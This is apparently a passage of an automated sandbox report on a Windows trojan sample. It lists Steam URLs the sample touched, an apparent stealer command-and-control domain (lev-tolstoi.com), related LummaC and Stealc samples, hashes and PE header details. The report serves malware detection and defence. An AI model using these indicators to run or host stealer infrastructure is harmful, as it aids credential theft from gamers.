                                                                                                                                                                                                                https://login.steampowered.com/mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://store.steammgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://store.steampowered.com/legal/mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&amgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://community.fastly.steamstamgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  https://store.steampowered.com/mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngmgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      http://127.0.0.1:27060mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        104.21.66.86
                                                                                                                                                                                                                                        		lev-tolstoi.comUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        104.102.49.254
                                                                                                                                                                                                                                        		steamcommunity.comUnited States
                                                                                                                                                                                                                                        		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1579774
                                                                                                                                                                                                                                        Start date and time:2024-12-23 08:53:24 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 3m 26s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:mgEXk8ip26.exe
                                                                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                                                                        Original Sample Name:f54dd0914c65108d5f72049dc5490f53.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                        • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.223.35.26, 20.109.210.53, 20.231.128.67, 2.16.158.187, 13.107.246.63
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, arc.msn.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, sls.update.microsoft.com, arc.trafficmanager.net, azureedge-t-prod.trafficmanager.net, iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                        02:54:18API Interceptor4x Sleep call for process: mgEXk8ip26.exe modified

                                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                        104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                        • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                        http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • www.valvesoftware.com/legal.htm

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        lev-tolstoi.comBire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        steamcommunity.com44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        s-part-0035.t-0009.t-msedge.net4je7za5c0V.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        dnf5RWZv2v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        ME3htMIepa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        stealcy11.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        fiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        mPQW1NB2Px.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        uw7vXaPNPF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                                                                                        fp2e7a.wpc.phicdn.netr4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        dnf5RWZv2v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        crhRJnVd08.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        xWnpPJbKGK.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        1fgVMJOnF0.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        cred64.dll.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        iepdf32.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        • 192.229.221.95

                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        AKAMAI-ASUS44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 23.222.144.153
                                                                                                                                                                                                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 104.72.108.202
                                                                                                                                                                                                                                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 23.79.17.106
                                                                                                                                                                                                                                        arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                        • 23.217.44.145
                                                                                                                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                        • 23.57.209.219
                                                                                                                                                                                                                                        m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                        • 104.119.158.106
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        • 2.20.41.184
                                                                                                                                                                                                                                        CLOUDFLARENETUSBire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                                                                        FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                        w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                        pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.32.96

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e144EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 104.102.49.254

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        No created / dropped files found

                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.948031836579877
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:mgEXk8ip26.exe
                                                                                                                                                                                                                                        File size:1'812'480 bytes
                                                                                                                                                                                                                                        MD5:f54dd0914c65108d5f72049dc5490f53
                                                                                                                                                                                                                                        SHA1:2698c99f98e65b28f31f9bdc0e68b6941de38f2a
                                                                                                                                                                                                                                        SHA256:4a2803914a4269806a4cb5525ec40edaf2274e496d0e9d87be9988d1da4b02d5
                                                                                                                                                                                                                                        SHA512:f07cf1d239db394739a491cb72943411aefee4de229b3b9ce9057c42c02bcd33b63e67fc642507754a704e10dea6c095ae064c283543b0fadfca0d2bcddc701d
                                                                                                                                                                                                                                        SSDEEP:24576:6laOplIkBorW5eUzD6GDjNzVycduGxxmaGOy4YYbsofVosgRIj/gXQTstdRx3uP:6laOplIvWlP/2t+LQ4YDoym/ItTxe
                                                                                                                                                                                                                                        TLSH:8C853369A63FA1F3F04951BE987E3342FF1C9B055955C1A7128AD86B7C828BD2834CD3
                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................. H...........@..........................PH......W....@.................................T0..h..

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Entrypoint:0x882000
                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        jmp 00007FA3990C863Ah
                                                                                                                                                                                                                                        jbe 00007FA3990C8651h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        jmp 00007FA3990CA635h
                                                                                                                                                                                                                                        add byte ptr [0000000Ah], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax+eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        push es
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add bh, bh
                                                                                                                                                                                                                                        inc dword ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edi], bl
                                                                                                                                                                                                                                        add byte ptr [eax+000000FEh], ah
                                                                                                                                                                                                                                        add byte ptr [edx], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edx], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ebp+00000080h], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1ac.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
